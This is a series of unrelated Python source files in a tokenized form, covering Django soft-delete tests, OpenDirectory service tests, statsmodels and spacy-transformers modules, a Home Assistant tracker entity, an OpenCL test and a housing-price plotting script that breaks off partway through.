<import_stmt>unittest<import_from_stmt>django.db models<import_from_stmt>..config DELETED_VISIBLE<import_from_stmt>..models SafeDeleteModel<import_from_stmt>.testcase SafeDeleteTestCase<class_stmt>ManyToManyChild(models.Model)<block_start><pass><block_end><class_stmt>ManyToManyOtherChild(models.Model)<block_start><pass><block_end><class_stmt>ManyToManyOtherChildThrough(SafeDeleteModel)<block_start>other_child=models.ForeignKey(ManyToManyOtherChild on_delete=models.CASCADE)<line_sep>parent=models.ForeignKey('ManyToManyParent' on_delete=models.CASCADE)<block_end><class_stmt>ManyToManyParent(SafeDeleteModel)<block_start>children=models.ManyToManyField(ManyToManyChild blank=<true> related_name='parents')<line_sep>other_children=models.ManyToManyField(ManyToManyOtherChild blank=<true> related_name='parents' through=ManyToManyOtherChildThrough )<block_end><class_stmt>ManyToManyTestCase(SafeDeleteTestCase)<block_start>@unittest.expectedFailure<def_stmt>test_many_to_many_through self<block_start>""" This is not supported yet! """<line_sep>parent=ManyToManyParent.objects.create()<line_sep>other_child=ManyToManyOtherChild.objects.create()<line_sep>through=ManyToManyOtherChildThrough.objects.create(other_child=other_child parent=parent)<line_sep>self.assertEqual(parent.manytomanyotherchildthrough_set.all().count() 1)<line_sep>self.assertEqual(parent.other_children.all().count() 1)<line_sep>through.delete()<line_sep>self.assertEqual(parent.manytomanyotherchildthrough_set.all().count() 0)<line_sep>self.assertEqual(parent.other_children.all().count() 0)<block_end><def_stmt>test_many_to_many self<block_start>"""Test whether related queries still works."""<line_sep>parent1=ManyToManyParent.objects.create()<line_sep>parent2=ManyToManyParent.objects.create()<line_sep>child=ManyToManyChild.objects.create()<line_sep>parent1.children.add(child)<line_sep>parent2.children.add(child)<line_sep># The child should still have both parents self.assertEqual(child.parents.all().count() 2)<line_sep># Soft deleting one parent, should "hide" it from the related field parent1.delete()<line_sep>self.assertEqual(child.parents.all().count() 1)<line_sep># But explicitly saying you want to "show" them, shouldn't hide them self.assertEqual(child.parents.all(force_visibility=DELETED_VISIBLE).count() 2)<block_end><block_end>
## # Copyright (c) 2014-2017 Apple Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ## """ OpenDirectory live service tests. """<import_from_future_stmt> print_function<import_from_stmt>itertools chain<import_from_stmt>uuid UUID<import_from_stmt>twisted.trial unittest<import_from_stmt>twisted.internet.defer inlineCallbacks returnValue<try_stmt><block_start><import_from_stmt>twext.who.opendirectory DirectoryService<line_sep>moduleImported=<true><block_end><except_stmt><block_start>moduleImported=<false><line_sep>print("Could not import OpenDirectory")<block_end><if_stmt>moduleImported<block_start><import_from_stmt>twext.who.expression CompoundExpression Operand MatchExpression MatchType MatchFlags <import_from_stmt>txdav.who.directory CalendarDirectoryServiceMixin<import_from_stmt>txdav.who.opendirectory DirectoryService<as>OpenDirectoryService<class_stmt>CalOpenDirectoryService(OpenDirectoryService CalendarDirectoryServiceMixin)<block_start><pass><block_end>LOCAL_SHORTNAMES="odtestalbert odtestbill odtestcarl odtestdavid odtestsubgroupa".split()<line_sep>NETWORK_SHORTNAMES="odtestamanda odtestbetty odtestcarlene odtestdenise odtestsubgroupb odtestgrouptop".split()<def_stmt>onlyIfPopulated func<block_start>""" Only run the decorated test method if the "odtestamanda" record exists """<line_sep>@inlineCallbacks<def_stmt>checkThenRun self<block_start>record=<yield>self.service.recordWithShortName(self.service.recordType.user u"odtestamanda")<if_stmt>record<is><not><none><block_start>result=<yield>func(self)<line_sep>returnValue(result)<block_end><else_stmt><block_start>print("OD not populated, skipping {}".format(func.func_name))<block_end><block_end><return>checkThenRun<block_end><class_stmt>LiveOpenDirectoryServiceTestCase(unittest.TestCase)<block_start>""" Live service tests for L{DirectoryService}. 
"""<def_stmt>setUp self<block_start>self.service=DirectoryService()<block_end><def_stmt>tearDown self<block_start>self.service._deletePool()<block_end><def_stmt>verifyResults self records expected unexpected<block_start>shortNames=[]<for_stmt>record records<block_start><for_stmt>shortName record.shortNames<block_start>shortNames.append(shortName)<block_end><block_end><for_stmt>name expected<block_start>self.assertTrue(name<in>shortNames)<block_end><for_stmt>name unexpected<block_start>self.assertFalse(name<in>shortNames)<block_end><block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_shortNameStartsWith self<block_start>records=<yield>self.service.recordsFromExpression(MatchExpression(self.service.fieldName.shortNames u"odtest" matchType=MatchType.startsWith))<line_sep>self.verifyResults(records chain(LOCAL_SHORTNAMES NETWORK_SHORTNAMES) ["anotherodtestamanda" "anotherodtestalbert"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_uid self<block_start><for_stmt>uid,name ((u"9DC04A71-E6DD-11DF-9492-0800200C9A66" u"odtestbetty") (u"9DC04A75-E6DD-11DF-9492-0800200C9A66" u"odtestbill") )<block_start>record=<yield>self.service.recordWithUID(uid)<line_sep>self.assertTrue(record<is><not><none>)<line_sep>self.assertEquals(record.shortNames[0] name)<block_end><block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_guid self<block_start><for_stmt>guid,name ((UUID("9DC04A71-E6DD-11DF-9492-0800200C9A66") u"odtestbetty") (UUID("9DC04A75-E6DD-11DF-9492-0800200C9A66") u"odtestbill") )<block_start>record=<yield>self.service.recordWithGUID(guid)<line_sep>self.assertTrue(record<is><not><none>)<line_sep>self.assertEquals(record.shortNames[0] name)<block_end><block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_compoundWithoutRecordType self<block_start>expression=CompoundExpression([CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"be" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"be" matchType=MatchType.startsWith) ] Operand.OR) CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"test" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"test" matchType=MatchType.startsWith) ] Operand.OR) ] Operand.AND)<line_sep>records=<yield>self.service.recordsFromExpression(expression)<line_sep># We should get back users and groups since we did not specify a type: self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_compoundWithExplicitRecordType self<block_start>expression=CompoundExpression([CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"be" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"be" matchType=MatchType.startsWith) ] Operand.OR) CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"test" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"test" matchType=MatchType.startsWith) ] Operand.OR) ] Operand.AND)<line_sep>records=<yield>self.service.recordsFromExpression(expression recordTypes=[self.service.recordType.user])<line_sep># We should get back users but not groups: self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" 
"odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_compoundWithMultipleExplicitRecordTypes self<block_start>expression=CompoundExpression([CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"be" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"be" matchType=MatchType.startsWith) ] Operand.OR) CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"test" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"test" matchType=MatchType.startsWith) ] Operand.OR) ] Operand.AND)<line_sep>records=<yield>self.service.recordsFromExpression(expression recordTypes=[self.service.recordType.user self.service.recordType.group])<line_sep># We should get back users and groups: self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingTokens self<block_start>self.calService=CalOpenDirectoryService()<line_sep>records=<yield>self.calService.recordsMatchingTokens([u"be" u"test"])<line_sep>self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingTokensWithContextUser self<block_start>self.calService=CalOpenDirectoryService()<line_sep>records=<yield>self.calService.recordsMatchingTokens([u"be" u"test"] context=self.calService.searchContext_user)<line_sep>self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" ] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb" "odtestgroupbetty" "odtestgroupalbert"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingTokensWithContextGroup self<block_start>self.calService=CalOpenDirectoryService()<line_sep>records=<yield>self.calService.recordsMatchingTokens([u"be" u"test"] context=self.calService.searchContext_group)<line_sep>self.verifyResults(records ["odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb" "odtestbetty" "odtestalbert" "anotherodtestalbert"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingMultipleFieldsNoRecordType self<block_start>self.calService=CalOpenDirectoryService()<line_sep>fields=((u"fullNames" u"be" MatchFlags.caseInsensitive MatchType.contains) (u"fullNames" u"test" MatchFlags.caseInsensitive MatchType.contains) )<line_sep>records=(<yield>self.calService.recordsMatchingFields(fields operand=Operand.AND recordType=<none>))<line_sep>self.verifyResults(records ["odtestgroupbetty" "odtestgroupalbert" "odtestbetty" "odtestalbert" "anotherodtestalbert"] ["odtestamanda" ])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingSingleFieldNoRecordType self<block_start>self.calService=CalOpenDirectoryService()<line_sep>fields=((u"fullNames" u"test" MatchFlags.caseInsensitive MatchType.contains) )<line_sep>records=(<yield>self.calService.recordsMatchingFields(fields operand=Operand.AND recordType=<none>))<line_sep>self.verifyResults(records ["odtestgroupbetty" "odtestgroupalbert" "odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestamanda" ] ["nobody" ])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingFieldsWithRecordType 
self<block_start>self.calService=CalOpenDirectoryService()<line_sep>fields=((u"fullNames" u"be" MatchFlags.caseInsensitive MatchType.contains) (u"fullNames" u"test" MatchFlags.caseInsensitive MatchType.contains) )<line_sep>records=(<yield>self.calService.recordsMatchingFields(fields operand=Operand.AND recordType=self.calService.recordType.user))<line_sep>self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert"] ["odtestamanda" "odtestgroupalbert" "odtestgroupbetty" ])<block_end><block_end><block_end>
""" See statsmodels.tsa.arima.model.ARIMA and statsmodels.tsa.SARIMAX. """<line_sep>ARIMA_DEPRECATION_ERROR=""" statsmodels.tsa.arima_model.ARMA and statsmodels.tsa.arima_model.ARIMA have been removed in favor of statsmodels.tsa.arima.model.ARIMA (note the . between arima and model) and statsmodels.tsa.SARIMAX. statsmodels.tsa.arima.model.ARIMA makes use of the statespace framework and is both well tested and maintained. It also offers alternative specialized parameter estimators. """<class_stmt>ARMA<block_start>""" ARMA has been deprecated in favor of the new implementation See Also -------- statsmodels.tsa.arima.model.ARIMA ARIMA models with a variety of parameter estimators statsmodels.tsa.statespace.SARIMAX SARIMAX models estimated using MLE """<def_stmt>__init__ self *args **kwargs<block_start><raise>NotImplementedError(ARIMA_DEPRECATION_ERROR)<block_end><block_end><class_stmt>ARIMA(ARMA)<block_start>""" ARIMA has been deprecated in favor of the new implementation See Also -------- statsmodels.tsa.arima.model.ARIMA ARIMA models with a variety of parameter estimators statsmodels.tsa.statespace.SARIMAX SARIMAX models estimated using MLE """<def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end><class_stmt>ARMAResults<block_start>""" ARMA has been deprecated in favor of the new implementation See Also -------- statsmodels.tsa.arima.model.ARIMA ARIMA models with a variety of parameter estimators statsmodels.tsa.statespace.SARIMAX SARIMAX models estimated using MLE """<def_stmt>__init__ self *args **kwargs<block_start><raise>NotImplementedError(ARIMA_DEPRECATION_ERROR)<block_end><block_end><class_stmt>ARIMAResults(ARMAResults)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end>
<import_from_stmt>typing Callable Iterable List<import_from_stmt>functools partial<import_from_stmt>spacy.tokens Doc Span<import_from_stmt>.util registry<line_sep>SpannerT=Callable[[List[Doc]] List[List[Span]]]<def_stmt>get_strided_spans docs:Iterable[Doc] window:int stride:int<arrow>List[List[Span]]<block_start>spans=[]<for_stmt>doc docs<block_start>start=0<line_sep>spans.append([])<for_stmt>i range(len(doc)<floordiv>stride)<block_start>spans[-1].append(doc[start:start+window])<if_stmt>(start+window)<ge>len(doc)<block_start><break><block_end>start<augadd>stride<block_end><else_stmt><block_start><if_stmt>start<l>len(doc)<block_start>spans[-1].append(doc[start:])<block_end><block_end><block_end><return>spans<block_end>@registry.span_getters("spacy-transformers.strided_spans.v1")<def_stmt>configure_strided_spans window:int stride:int<arrow>SpannerT<block_start>""" Set the 'window' and 'stride' options for getting strided spans. If you set the window and stride to the same value, the spans will cover each token once. Setting 'stride' lower than 'window' will allow for an overlap, so that some tokens are counted twice. This can be desirable, because it allows all tokens to have both a left and right context. """<line_sep><return>partial(get_strided_spans window=window stride=stride)<block_end><def_stmt>get_sent_spans docs:Iterable[Doc]<arrow>List[List[Span]]<block_start><return>[list(doc.sents)<for>doc docs]<block_end>@registry.span_getters("spacy-transformers.sent_spans.v1")<def_stmt>configure_get_sent_spans <arrow>Callable<block_start>""" Create a `span_getter` that uses sentence boundary markers to extract the spans. This requires sentence boundaries to be set, and may result in somewhat uneven batches, depending on the sentence lengths. However, it does provide the transformer with more meaningful windows to attend over. """<line_sep><return>get_sent_spans<block_end><def_stmt>get_doc_spans docs:Iterable[Doc]<arrow>List[List[Span]]<block_start><return>[[doc[:]]<for>doc docs]<block_end>@registry.span_getters("spacy-transformers.doc_spans.v1")<def_stmt>configure_get_doc_spans <arrow>Callable<block_start>""" Create a `span_getter` that uses the whole document as its spans. This is the best approach if your `Doc` objects already refer to relatively short texts. """<line_sep><return>get_doc_spans<block_end>get_sent_spans=configure_get_sent_spans()<line_sep>get_doc_spans=configure_get_doc_spans()<line_sep>__all__=["get_sent_spans" "get_doc_spans" "configure_get_doc_spans" "configure_get_sent_spans" "configure_strided_spans" ]<line_sep>
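# A usage sketch for the span getters above, calling them directly instead of through the
# registry/config machinery; spacy.blank("en") and the sample sentence are placeholders.
# get_sent_spans is omitted because a blank pipeline has no sentence boundaries set.
import spacy

nlp = spacy.blank("en")
doc = nlp("one two three four five six seven eight nine ten")

strided = configure_strided_spans(window=4, stride=3)
print(strided([doc]))        # overlapping 4-token windows, advancing 3 tokens at a time
print(get_doc_spans([doc]))  # a single span covering the whole doc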
"""Support for Tractive device trackers."""<import_from_future_stmt> annotations<import_from_stmt>typing Any<import_from_stmt>homeassistant.components.device_tracker SOURCE_TYPE_BLUETOOTH SOURCE_TYPE_GPS <import_from_stmt>homeassistant.components.device_tracker.config_entry TrackerEntity<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.core HomeAssistant callback<import_from_stmt>homeassistant.helpers.dispatcher async_dispatcher_connect<import_from_stmt>homeassistant.helpers.entity_platform AddEntitiesCallback<import_from_stmt>. Trackables<import_from_stmt>.const CLIENT DOMAIN SERVER_UNAVAILABLE TRACKABLES TRACKER_HARDWARE_STATUS_UPDATED TRACKER_POSITION_UPDATED <import_from_stmt>.entity TractiveEntity<async_keyword><def_stmt>async_setup_entry hass:HomeAssistant entry:ConfigEntry async_add_entities:AddEntitiesCallback<arrow><none><block_start>"""Set up Tractive device trackers."""<line_sep>client=hass.data[DOMAIN][entry.entry_id][CLIENT]<line_sep>trackables=hass.data[DOMAIN][entry.entry_id][TRACKABLES]<line_sep>entities=[TractiveDeviceTracker(client.user_id item)<for>item trackables]<line_sep>async_add_entities(entities)<block_end><class_stmt>TractiveDeviceTracker(TractiveEntity TrackerEntity)<block_start>"""Tractive device tracker."""<line_sep>_attr_icon="mdi:paw"<def_stmt>__init__ self user_id:str item:Trackables<arrow><none><block_start>"""Initialize tracker entity."""<line_sep>super().__init__(user_id item.trackable item.tracker_details)<line_sep>self._battery_level:int=item.hw_info["battery_level"]<line_sep>self._latitude:float=item.pos_report["latlong"][0]<line_sep>self._longitude:float=item.pos_report["latlong"][1]<line_sep>self._accuracy:int=item.pos_report["pos_uncertainty"]<line_sep>self._source_type:str=item.pos_report["sensor_used"]<line_sep>self._attr_name=f"{self._tracker_id} {item.trackable['details']['name']}"<line_sep>self._attr_unique_id=item.trackable["_id"]<block_end>@property<def_stmt>source_type self<arrow>str<block_start>"""Return the source type, eg gps or router, of the device."""<if_stmt>self._source_type<eq>"PHONE"<block_start><return>SOURCE_TYPE_BLUETOOTH<block_end><return>SOURCE_TYPE_GPS<block_end>@property<def_stmt>latitude self<arrow>float<block_start>"""Return latitude value of the device."""<line_sep><return>self._latitude<block_end>@property<def_stmt>longitude self<arrow>float<block_start>"""Return longitude value of the device."""<line_sep><return>self._longitude<block_end>@property<def_stmt>location_accuracy self<arrow>int<block_start>"""Return the gps accuracy of the device."""<line_sep><return>self._accuracy<block_end>@property<def_stmt>battery_level self<arrow>int<block_start>"""Return the battery level of the device."""<line_sep><return>self._battery_level<block_end>@callback<def_stmt>_handle_hardware_status_update self event:dict[str Any]<arrow><none><block_start>self._battery_level=event["battery_level"]<line_sep>self._attr_available=<true><line_sep>self.async_write_ha_state()<block_end>@callback<def_stmt>_handle_position_update self event:dict[str Any]<arrow><none><block_start>self._latitude=event["latitude"]<line_sep>self._longitude=event["longitude"]<line_sep>self._accuracy=event["accuracy"]<line_sep>self._source_type=event["sensor_used"]<line_sep>self._attr_available=<true><line_sep>self.async_write_ha_state()<block_end>@callback<def_stmt>_handle_server_unavailable 
self<arrow><none><block_start>self._attr_available=<false><line_sep>self.async_write_ha_state()<block_end><async_keyword><def_stmt>async_added_to_hass self<arrow><none><block_start>"""Handle entity which will be added."""<line_sep>self.async_on_remove(async_dispatcher_connect(self.hass f"{TRACKER_HARDWARE_STATUS_UPDATED}-{self._tracker_id}" self._handle_hardware_status_update ))<line_sep>self.async_on_remove(async_dispatcher_connect(self.hass f"{TRACKER_POSITION_UPDATED}-{self._tracker_id}" self._handle_position_update ))<line_sep>self.async_on_remove(async_dispatcher_connect(self.hass f"{SERVER_UNAVAILABLE}-{self._user_id}" self._handle_server_unavailable ))<block_end><block_end>
# Copyright (c) 2014-2017, NVIDIA CORPORATION. All rights reserved. <import_from_future_stmt> absolute_import<import_from_stmt>.images ImageClassificationDatasetJob GenericImageDatasetJob<import_from_stmt>.generic GenericDatasetJob<import_from_stmt>.job DatasetJob<line_sep>__all__=['ImageClassificationDatasetJob' 'GenericImageDatasetJob' 'GenericDatasetJob' 'DatasetJob' ]<line_sep>
# Copyright <NAME> 2017 """ Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """<import_stmt>numpy<as>np<import_stmt>pyopencl<as>cl<import_stmt>os<import_stmt>math<import_stmt>pytest<import_from_stmt>test test_common<import_from_stmt>test.test_common offset_type<def_stmt>test_memcpy context q int_data int_data_gpu<block_start>ll_code=""" declare void @_Z6memcpyPvPKvm(i8*, i8*, i64) define void @mykernel(i32* %data) { %1 = bitcast i32* %data to i8* %2 = getelementptr i32, i32* %data, i32 8 %3 = bitcast i32* %2 to i8* call void @_Z6memcpyPvPKvm(i8 *%3, i8 *%1, i64 32) ret void } """<line_sep>cl_code=test_common.ll_to_cl(ll_code 'mykernel' num_clmems=1)<line_sep>print('cl_code' cl_code)<for_stmt>i range(8)<block_start>int_data[i]=3+i<block_end>cl.enqueue_copy(q int_data_gpu int_data)<line_sep>kernel=test_common.build_kernel(context cl_code 'mykernel')<line_sep>kernel(q (32 ) (32 ) int_data_gpu offset_type(0) offset_type(0) cl.LocalMemory(32))<line_sep>from_gpu=np.copy(int_data)<line_sep>cl.enqueue_copy(q from_gpu int_data_gpu)<line_sep>q.finish()<for_stmt>i range(8)<block_start>print(i from_gpu[8+i])<assert_stmt>from_gpu[8+i]<eq>3+i<block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>pandas<as>pd<line_sep>imgfilename='table.png'<import_stmt>numpy<as>np<import_stmt>os<import_stmt>datetime<import_stmt>six<import_stmt>matplotlib.pyplot<as>plt<import_stmt>matplotlib<import_from_stmt>matplotlib gridspec<import_from_stmt>pypinyin pinyin<import_stmt>numpy<as>np<import_from_stmt>matplotlib.font_manager FontProperties<line_sep>font=FontProperties(fname='font/Songti.ttc' size=18)<line_sep>matplotlib.font_manager.fontManager.addfont('font/Songti.ttc')<import_from_stmt>matplotlib.offsetbox TextArea DrawingArea OffsetImage AnnotationBbox<import_stmt>matplotlib.image<as>mpimg<def_stmt>read city<block_start>dfs=[]<for_stmt>root,dirs,files os.walk('data/chengjiao-%s/'%city)#print(root, files, dirs) <block_start>files.sort()<for_stmt>f files<block_start>fullPath=os.path.join(root f)<line_sep>#print(fullPath) df=<none><if_stmt>f.endswith('.xls')<block_start>df=pd.read_excel(fullPath converters={'成交价(元/平)':<lambda>x:float(x) '链家编号':str '产权年限':str})<block_end><elif_stmt>f.endswith('.csv')<block_start>df=pd.read_csv(fullPath converters={'成交价(元/平)':<lambda>x:float(x) '链家编号':str})<block_end><else_stmt><block_start><continue><block_end><if_stmt>len(df)<eq>0<block_start>print('No data in %s'%fullPath)<line_sep><continue><block_end><if_stmt>'单价(元/平米)'<in>df.columns<block_start>df['单价(元/平米)']=pd.to_numeric(df['单价(元/平米)'] errors="coerce")<block_end>df=df.rename(columns={'单价(元/平米)':'成交价(元/平)' '所属小区':'小区' '建筑面积:平米':'建筑面积' '浏览(次)':'浏览(次)' '关注(人)':'关注(人)' '带看(次)':'带看(次)' '所属下辖区':'下辖区' '房权所属':'产权所属' '房屋朝向':'朝向' '调价(次)':'调价(次)' '建成时间:年':'建成时间' '所属商圈':'商圈' '装修情况':'装修' '成交周期(天)':'成交周期(天)' '房屋户型':'户型' '产权年限':'土地年限' '楼层状态':'所在楼层' '挂牌价格(万)':'挂牌价格(万)' '配备电梯':'电梯'})<line_sep>#去掉面积单位 <try_stmt><block_start>mj=df['建筑面积']<line_sep>mj_num=[]<for_stmt>m mj<block_start>m=str(m)<if_stmt>'㎡'<in>m<block_start>m=m[:m.find('㎡')]<block_end><try_stmt><block_start>m=float(m)<block_end><except_stmt><block_start>m=np.nan<block_end>mj_num.append(m)<block_end>df['建筑面积']=mj_num<block_end><except_stmt><block_start><pass><block_end>#统一成交时间格式 <try_stmt><block_start>time=[]<for_stmt>t df['成交时间']<block_start>t=str(t)<if_stmt>'/'<in>t<block_start>t='-'.join(t.split('/'))<block_end><if_stmt>'成交'<in>t<block_start>t=t.replace('成交' '').strip()<block_end>time.append(t)<block_end>df['成交时间']=time<block_end><except_stmt>Exception<as>e<block_start>df.columns<line_sep>print(fullPath)<line_sep>print('成交时间错误' e)<line_sep><pass><block_end>#去掉售价单位 <try_stmt><block_start>sj=df['售价(万)']<line_sep>sj_num=[]<for_stmt>s sj<block_start>s=str(s)<if_stmt>'万'<in>s<block_start>s=s[:s.find('万')]<block_end><if_stmt>'-'<in>s#print(s) <block_start>s=s.split('-')[-1]<block_end>s=float(s)<line_sep>sj_num.append(s)<block_end>df['售价(万)']=sj_num<block_end><except_stmt><block_start><pass><block_end><try_stmt><block_start>df['成交价(元/平)']=pd.to_numeric(df['成交价(元/平)'] errors='coerse')<block_end><except_stmt><block_start><pass><block_end><if_stmt>len(df)<g>0<block_start>dfs.append(df)<block_end><block_end><block_end>df=pd.concat(dfs)<line_sep>print('raw count:' len(df))<line_sep>df=df.drop_duplicates(subset=['链家编号'])<line_sep>print('count after drop duplicates' len(df))<if_stmt>city<in>['北京' '上海' '深圳']<block_start>df=df.loc[df['成交价(元/平)']<g>10000]<block_end><elif_stmt>city<in>['广州' '杭州']<block_start>df=df.loc[df['成交价(元/平)']<g>5000]<block_end><else_stmt><block_start>df=df.loc[df['成交价(元/平)']<g>1000]<block_end>df=df.loc[df['成交价(元/平)']<l>200000]<line_sep>print('count after drop less than 1000' len(df))<if_stmt>city<not><in>['重庆' 'allcq' 
'南京']<block_start>df=df.loc[~df['土地年限'].str.contains('40' na=<false>)]<line_sep>df=df.loc[~df['土地年限'].str.contains('50' na=<false>)]<block_end>print('count after drop 40, 50' len(df))<line_sep>df=df.set_index('链家编号')<line_sep>#print(len(df)) <return>df<block_end>MA=<true><line_sep>#MA = False ma_length=30<line_sep>start_date='2017-01-01'<line_sep>city='default'<def_stmt>get_moving_average res ma_length keep_all=<false><block_start>startDate=datetime.datetime.strptime(res.index[0] '%Y-%m-%d')<line_sep>endDate=datetime.datetime.strptime(res.index[-1] '%Y-%m-%d')<line_sep>#print(startDate, endDate) date_range=[str(x.date())<for>x pd.date_range(startDate endDate)]<line_sep>volume_ma=[]<line_sep>median_ma=[]<line_sep>mean_ma=[]<for_stmt>i range(len(date_range)-ma_length)<block_start>interval_data=res.loc[(res.index<ge>date_range[i])&(res.index<le>date_range[i+ma_length])]<line_sep>volume_ele=sum(interval_data['volume'])<line_sep>median_ele=0<line_sep>mean_ele=0<for_stmt>index,row interval_data.iterrows()<block_start>median_ele<augadd>row['volume']<times>row['median_price']<line_sep>mean_ele<augadd>row['volume']<times>row['mean_price']<block_end>volume_ma.append(volume_ele)<if_stmt>volume_ele<eq>0<block_start>median_ma.append(median_ma[-1])<line_sep>mean_ma.append(mean_ma[-1])<block_end><else_stmt><block_start>median_ma.append(median_ele/volume_ele)<line_sep>mean_ma.append(mean_ele/volume_ele)<block_end><block_end>last_index=0<if_stmt>keep_all<eq><false><block_start><for_stmt>i range(len(volume_ma))<block_start><if_stmt>volume_ma[i]<l>ma_length/6<block_start>last_index=i<block_end><block_end><block_end>volume_ma=volume_ma[last_index+1:]<line_sep>median_ma=median_ma[last_index+1:]<line_sep>mean_ma=mean_ma[last_index+1:]<line_sep><return>pd.DataFrame({'volume':volume_ma 'median_price':median_ma 'mean_price':mean_ma} index=date_range[ma_length+last_index+1:])<block_end><def_stmt>resetXticks ax res<block_start>labels=res.index<line_sep>xticks=ax.get_xticks()<if_stmt>len(xticks)<l>366<block_start>tick_month=['%0.2d'%i<for>i range(1 13)]<block_end><else_stmt><block_start>tick_month=['%0.2d'%i<for>i range(1 13 3)]<block_end>target_xticks=[]<line_sep>last_index=0<line_sep>month_mark=set()<for_stmt>i range(len(labels))<block_start>label=labels[i]<line_sep>tick=xticks[i]<line_sep>(year month day)=label.split('-')<if_stmt>month<in>tick_month<and>'-'.join([year month])<not><in>month_mark<block_start>month_mark.add('-'.join([year month]))<line_sep>last_index=i<line_sep>target_xticks.append(tick)<block_end><block_end><if_stmt>len(res)-last_index<l>20<block_start>target_xticks=target_xticks[:-1]+[xticks[-1]]<block_end><else_stmt><block_start>target_xticks=target_xticks+[xticks[-1]]<block_end>ax.set_xticks(target_xticks)<block_end><def_stmt>plot res city title MA ma_length start_date=<none> force=<false> keep_all=<false><block_start><if_stmt>force<eq><false><and>len(res)<l>10+ma_length<block_start><return>pd.DataFrame()<block_end><if_stmt>MA<eq><true><block_start>res=get_moving_average(res ma_length keep_all)<block_end><if_stmt>force<eq><false><and>len(res)<l>10<block_start><return>pd.DataFrame()<block_end><if_stmt>start_date<is><not><none><block_start>res=res.loc[res.index<ge>start_date :]<if_stmt>len(res)<g>0<and>res.index[0]<g>start_date<block_start>date_range=[str(x.date())<for>x pd.date_range(start_date res.index[0])]<line_sep>date_range=[str(x.date())<for>x pd.date_range(start_date res.index[0])]<line_sep>padding=pd.DataFrame(columns=res.columns 
index=date_range[:-1])<line_sep>padding.volume=[0]<times>len(padding)<line_sep>res=pd.concat([padding res])<block_end><block_end>plt.rcParams['font.sans-serif']=['SimHei']<line_sep>matplotlib.rc('font' size=18)<line_sep>matplotlib.rcParams['figure.figsize']=[15 15]<line_sep>gs=gridspec.GridSpec(2 1 height_ratios=[3 1])<line_sep>ax0=plt.subplot(gs[0])<line_sep>ax0.plot(res['median_price'])<line_sep>ax0.plot(res['mean_price'])<line_sep>ax0.legend(['%d日中位数=%.0f'%(ma_length res['median_price'][-1]) '%d日均价=%.0f'%(ma_length res['mean_price'][-1])] prop=font)<line_sep>x1,x2,y1,y2=ax0.axis()<line_sep>ax0.axis((x1 x2 0 y2))<line_sep>#插入二维码 qrcode=mpimg.imread('wechatqrcode.png')<line_sep>imagebox=OffsetImage(qrcode zoom=0.5)<line_sep>ab=AnnotationBbox(imagebox (0.2<times>x2 0.2<times>y2))<line_sep>ax0.add_artist(ab)<line_sep>resetXticks(ax0 res)<line_sep>plt.setp(ax0.get_xticklabels() visible=<false>)<line_sep>plt.grid(<true>)<line_sep>plt.title(title+'--欢迎扫二维码关注公众号获取其他城市房价走势还有低佣金证券开户' fontproperties=font)<line_sep>#重画x轴 ax1=plt.subplot(gs[1])<line_sep>#ax1.bar(res.index, res['volume']) ax1.fill_between(res.index 